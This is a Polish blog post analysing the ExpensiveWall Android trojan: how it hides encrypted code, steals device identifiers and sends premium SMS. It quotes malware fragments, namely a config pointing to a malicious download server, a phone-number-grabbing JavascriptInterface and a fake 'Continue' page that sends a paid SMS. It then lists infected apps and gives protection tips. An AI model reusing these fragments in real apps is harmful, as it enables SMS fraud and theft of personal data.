Mimo pracy Google nad bezpieczeństwem użytkowników, przy takiej ilości aplikacji i urządzeń (blisko 80% rynku), nie jest możliwe zatrzymanie wszystkich aplikacji zarażonych kodem malware, jakie trafią do Sklepu.

Tak też jest z najnowszym wykrytym trojanem atakującym urządzenia z systemem Android, czyli ExpensiveWall.

Nowe malware działa na podobnej zasadzie co trojan z początku tego roku. Tamten zdążył zarazić aż 4,2 miliona urządzeń!

Trojany tego typu dostają się na urządzenia wykorzystując użytkownika, który instaluje zainfekowaną przez nie aplikację. Jako, że aplikacje te są zbudowane dla systemów starszych niż 6.0, tak więc nie wymagają nadania specjalnych praw dostępu (takie aplikacje zazwyczaj wymagają jedynie tych do telefonu, czy pamięci, no i oczywiście internetu i SMSów), które wprowadzono wraz z nowszymi wersjami Androida. Dzięki temu w łatwy sposób malware może uzyskać dostęp do danych z urządzenia – wliczając w to numer telefonu, lokalizację urządzenia, zainstalowane aplikacje, czy adres IP. Dodatkowo może rozpocząć subskrypcję płatnych wiadomości SMS Premium.

ExpensiveWall

ExpensiveWall po raz pierwszy został odkryty przez firmę Check Point w aplikacji Lovely Wallpaper.

Nazwa kodowa tego malware (w „języku” antywirusów) to Trojan.AndroidOS.ExpensiveWall.

Kod malware ukryty jest wewnątrz aplikacji. Dzięki zaszyfrowaniu lub zaszyfrowaniu pliku wykonywalnego, możliwe jest jego ukrycie przed skanerami Google. Po instalacji, dochodzi do rozpakowania lub rozszyfrowania kodu (klucz także znajduje się w aplikacji), a następnie jego wykonania.

Choć na chwilę obecną malware wydaje się być jedynie skierowane na generowanie zysku, to jego możliwości na tym się nie kończą. Ten typ kodu może także zostać wykorzystany do robienia zdjęć i nagrywania dźwięku.

Jak działa?

W momencie pobrania, aplikacja prosi o nadanie kilku podstawowych zezwoleń – wliczając w to dostęp do internetu (służy do łączności z serwerem), czy wiadomości SMS (wysyłanie SMSów Premium).

Trzeba jednak pamiętać, że te pozowlenia wykorzystywane są także przez aplikacje nie zainfekowane przez jakiekolwiek malware. Nie dajmy się zwariować.

ExpensiveWall zawiera interfejs łączący aplikację z zawartym w niej kodem JavaScript, który uruchamiany jest poprzez WebView, a który służy do uruchamiania usług aplikacji. Po instalacji i nadaniu uprawnień, wysłane na serwer zostają podstawowe dane – podstawowe kody identyfikacyjne (IMEI, MEID, IMSI, MAC, czy IP) oraz lokalizacja urządzenia.

"trackingLink":"http://redrct.site/view/kKi3UGAbgSvGRkg90fhwj8uCN2tYPnQNtmfA6mcb410?c=20324&pid=1524&tid=",
  "isSaveContent":1,
  "name":Various Games Clickflow DE (1) ",
  "message":"Success",
  "pageRetryTimes":2,
  "type":"CLICK",
  :taskUuid":"d19a0f49-e06c-406a-8b04-ffc87d996986"

Przykładowy kod pochodzący z aplikacji zarażonej przez ExpensiveWall. Kod zawiera adres serwera, z którego pobrany zostanie kolejny złośliwy kod.

Przy każdym połączeniu z internetem, malware otrzymuje nowy adres do pobrania kolejnego kodu wykonywalnego.

Subskrypcja płatnych usług:

Pobrany kod może posłużyć m.in. do uruchomienia subskrypcji SMSów typu Premium dla numeru karty lub kart SIM włożonych do urządzenia. Koszt takich SMSów może wynieść nawet miliony monet.

     @JavascriptInterface public string getPhoneNumber()  {
          String v1;
          try {
               v1 =
URLEncoder.encode(TOOLAA.getPhoneNumber(MAINAA.this.context_, "UTF-8");
          }
          return v1;

Kod pozwalający na zdobycie numeru urządzenia:

Niby zwykły SMS, a może być bardzo kosztowny. Przykładowo w Polsce SMSy Premium nie przekraczają 25 zł, ale za sztukę! A subskrypcja wcale nie musi być na usługę polską. Wtedy płacimy zgodnie z opłatami w kraju pochodzenia usługi. Takie zagraniczne SMSy mogą kosztować nawet kilkadziesiąt $, € lub £, gdzie w przeliczeniu na złotówki wychodzą naprawdę ładne kwoty.

Wysyłanie SMSów Premium

Malware może nie tylko uruchomić subskrypcję, przez którą na urządzenie będą przychodzić SMSy Premium, ale także wysyłać płatne (i to bardzo wysoko) wiadomości.

W tym przypadku wysłanie SMSa może być niewidoczne dla użytkownika, a może być „zainicjowane” przez niego samego pojawić poprzez wciśnięcie przycisku Continue, w okienku wyświetlonym przez kod (przypominającym normalne okienko systemowe).

<html>
  <head>
     <meta charset="utf-8">
     <meta name+"viewport" content="width=device-width,initial-scale=1">
     <title>FunnyVideo</title>
     < script>
         function clicksms(){
             pagejs.sendSMS('GRA','60576');
         }
     </script>
  </head>
  <body>
    < div>
      < div id="content">
        <br>
        <br>
        <a id="button_pl" href="#" onclick="clicksms();">Continue</a>
        <br>
        <br>
      </div>
    </div>
  </body>
</html>

Kod JavaScript odpowiedzialny za wysyłanie wiadomości SMS. Tutaj na numer 60576 wysyłany jest SMS o treści GRA.

Powyżej jest kod z (jak mi się wydaje) polskim akcentem. Koszt wysłania tego SMSa to „jedynie” 5 zł (6,15zł z VAT). Sam numer 60576 jest uznawany za bezpieczny (wykorzystywany jest do zakupu gier, tapet, czy dźwięków) i nie jest blokowany przez żadnego z polskich operatorów.

Jak się chronić?

Uważaj co instalujesz

Nie wgrywać nieznanych aplikacji. Nie ważne jak bardzo reklamowanych na różnych portalach, zwłaszcza społecznościowych (wiele z zainfekowanych ExpensiveWall aplikacji reklamowana była na Instagramie).

Google też Cię chroni

Warto też mieć uruchomioną usługę Play Protect (wcześniej zwane Verify Apps). Choc usługa może wkurzać podczas instalacji z plików .apk (wyskakujące powiadomienie z pytaniem o przetestowanie aplikacji), to jednak w przypadku aplikacji zarażonych może nas uratować. Pozwala ona także na kontrolę już zainstalowanych aplikacji – w momencie, gdy Google uzna aplikację za malware, wysyłany jest sygnał do urządzeń z uruchomioną usługą (oczywiście internet też musi być uruchomiony), a ta automatycznie rozpocznie odinstalowywanie tej aplikacji.

Trochę zalatuje to atakiem na prywatność użytkowników, ale czy antywirusy działają inaczej? Też mają przecież pełen dostęp do testowanych plików.

   

Blokada SMSów Premium

Większość (wszyscy?) polskich operatorów posiada usługę blokowania SMSów typu Premium. Zarówno tych wysyłanych, jak i przychodzących.

Niestety sami musimy ją uruchomić, bo oryginalnie jest nieaktywna.

A może antywirus?

Nie jestem ich fanem na urządzeniach mobilnych, ale czasem mogą się jednak przydać.

Malware jest świeży, a więc nie wszytskie zdążyły go dodać do bazy wirusów.

Prym (co chyba nikogo nie zdziwi) w ochronie przed ExpensiveWall wiodą produkty Check Point – SandBlast Mobile dla Androida i Anti-Bot Blade dla systemów IoT (taka mała reklama z mojej strony :P).

Zainfekowane aplikacje:

Najstarsza wykryta aplikacja (Horoscope) dodana została do Sklepu 16 marca 2015 roku. Prawie 2,5 roku temu! Oczywiście wiele z zainfekowanych aplikacji może być wciąż niewykrytych, a więc nie musi to być najstarsza aplikacja działająca na korzyść twórców ExpensiveWall.

Najgorsze jest to, że wg badaczy tego malware, jest ono częścią zestawu zwanego gtk, którego kod wykorzystało wielu programistów, aby ułatwić sobie pracę na nową aplikacją. Mogli oni nawet nie wiedzieć o złośliwym kodzie, który dodają do swoich aplikacji. Wielu programistów aplikacji z popularnych kategorii, zwłaszcza tych, którzy chcą jedynie zarobić na reklamach, korzysta z tego typu zestawów bez większego zastanowienia. Znając życie są i tacy co nie wiedzą o nowym malware i dalej będą korzystać tworząc kolejne aplikacje. Na szczęście na chwilę obecną takie aplikacje nie przejdą skanu przeciw złośliwemu kodowi, a więc nie trafią „na widok publiczny”.

Wg statystyk Sklepu Play, (znane) aplikacje zainfekowane ExpensiveWall pobrano na między 5,9 a 21,1 milionów urządzeń (takie widełki są związane ze sposobem prezentowania liczby pobrań przez Google)!

Lista:

  • I Love Fliter – com.star.trek,
  • Tool Box Pro – com.newac.toolbox,
  • X WALLPAPER – com.newac.wallpaper,
  • Horoscope – com.yeahmobi.horoscopeinter,
  • X Wallpaper Pro – com.gkt.xwallpaper,
  • Beautiful Camera – com.gwqcv.zsfy,
  • Color Camera – com.gwqcv.zcom.hdsj.hdeysfy,
  • Love Photo – com.lovephoto.gp.inter,
  • Tide Camera – com.parrot.tidecmr,
  • Charming Camera – com.zerg.charmingcmr,
  • Horoscope – com.constellation.prophecy,
  • DIY Your Screen – com.desktoptools.screenunsubscribe,
  • Ringtone – com.gkt.ringtonegp,
  • ดวง 12 ราศี – com.gpthtwo.horoscope,
  • Lite Safe locker – com.guard.defend,
  • Wifi Booster – com.newac.wifibooster,
  • Cool Desktop – com.newera.desktop,
  • useful cube – com.newera.toolbox,
  • Tool Box Pro – com.pl.toolboxpro,
  • Useful Desktop – com.something.someone,
  • ดวง 12 ราศี – com.yeahmobi.horoscope,
  • Lite Horoscope2.0 – com.yeahmobi.horoscopegpadap,
  • Yes Star – com.cegqz.uoud,
  • Shiny Camera – com.cmr.shiny,
  • Simple Camera – com.johg.udrad,
  • Smiling Camera – com.scamera.smiling,
  • Universal Camera – com.cmr.universal,
  • Amazing Toolbox – com.gb.toolbox,
  • Easy capture – com.genesis.awesome,
  • Memory Doctor – com.newera.memorydoctor,
  • Tool Box Pro – com.pl.toolbox,
  • Reborn Beauty – com.sexy.pic,
  • Joy Photo – com.joy.photo.gp.inter Fancy,
  • Camera – com.fancy.camera.gp.inter,
  • Amazing Photo – com.amazing.photo.gp.inter,
  • Amazing Camera – com.amazing.camera.ggi,
  • Super Wallpaper – com.super.wallpaper.gp.inter,
  • DD Player – com.aolw.maoa,
  • Fascinating Camera – com.bbapcmr.fascinating,
  • Universal Camera – com.coral.muse,
  • Cream Camera – com.cream.lecoa Looking,
  • Camera – com.dmeq.oopes,
  • DD Weather – com.dosl.wthre Global,
  • Weather – com.fqaf.dlksk,
  • Love Fitness – com.ivxz.ykvlf,
  • Pretty Pictures – com.jpst.lsyk,
  • Cool Wallpapers – com.kifb.mifv,
  • Beauty Camera – com.magic.beautycmr,
  • Love locker – com.opaly.nqib,
  • Real Star – com.real.stargh,
  • Magic Camera – com.sadcmr.magic,
  • Wonder Camera – com.scamera.wonder,
  • Funny Camera – com.scmr.funny,
  • Easy Camera – com.simon.easy,
  • Smart Keyboard – com.smgft.keyboard,
  • Travel Camera – com.xnoc.jdvy,
  • Photo Warp – com.yiuw.fhly,
  • Lovely Wallpaper – com.yjmn.vokle,
  • Lattice Camera – com.ysyg.wtmca,
  • Quick Charger – fast.bats.chaz,
  • Up Camera – com.upcamera.xgcby,
  • Photo Power – com.photo.power.gp,
  • HDwallpaper – com.asdf.fg.hdwallpaper,
  • Wonderful Games – com.gb.wonderfulgames,
  • BI File Manager – com.gkt.fileexplorer,
  • Wallpapers HD – com.gkt.wallpapershd,
  • Beautiful Video-Edit your Memory – com.kevin.beautyvideo,
  • Wonderful Cam – com.newera.beautifulphoto,
  • useful cube – com.next.toolset,
  • Ringtone – com.ringtone.freshac,
  • Exciting Games – com.gkt.gamebar,
  • Replica Adventure – com.replica.adventure.gp,
  • GG Player – com.gg.player.gp,
  • Love Camera – com.love.camera.gp,
  • Oneshot Beautify – com.oneshot.beautify.gp,
  • Pretty Camera – com.pretty.camera.gp,
  • CuteCamera – com.hygk.hlhy,
  • Cartoon Camera-stylish, clean – com.kkcamera.akbcartoon,
  • Art Camera – com.craft.decorate,
  • Amazing Video – com.amazing.video.gp,
  • Fine Photo – com.fine.photo.gp,
  • Infinity safe – com.applocker.coldwar,
  • Magical Horoscope – com.final.horosope,
  • Toolbox – com.gp.toolboxche,
  • Cute Belle –  com.prettygirl.newyear,
  • CartoonWallpaper – com.roy.cartoonwallpaper,
  • Ringtone – com.thebell.newcentury,
  • Best Camera – com.aypx.ygzp,
  • Colorful Locker – com.colorful.locker,
  • Light Keyboard – com.hlux.wfsha,
  • Safe Privacy – com.ytkue.oprw,
  • Enjoy Wallpaper – com.qwer.enjoy.enjoywallpaper,
  • File Manager – com.file.manager.gp,
  • Fancy locker – com.highfirst.fancylocker,
  • Cute Puzzle – com.cute.puzzle.gp,
  • Smile Keyboard – com.keyboard.smile,
  • Vitality Camera – com.owexs.iouert,
  • Lock Now – com.tools.yidian,
  • Fancy Camera – com.camera.kfcfancy,
  • Useful Camera – com.hhcamera.useful,
  • Vitality Camera – com.owexs.iouert,
  • Sec Transfer – com.sec.transfer,
  • Lock Now – com.tools.yidian,
  • Magic Filter – com.bpmiddle.oneversion,
  • Funny Video – com.funny.video.gp,
  • Amazing Gamebox – com.ads.wowgames,
  • Super locker – com.wtns.superlocker,
  • Music Player – com.musicg.ckiqp.

Obstawiam, że powyższa lista to jedynie czubek góry lodowej, a liczbę zainfekowanych aplikacji można liczyć w setkach, jeśli nie tysiącach…

 

Jeżeli znalazłeś/aś literówkę w tekście, to daj nam o tym znać zaznaczając kursorem problematyczny wyraz, bądź zdanie i przyciśnij Shift + Enter lub kliknij Zgłoś pomyłkę.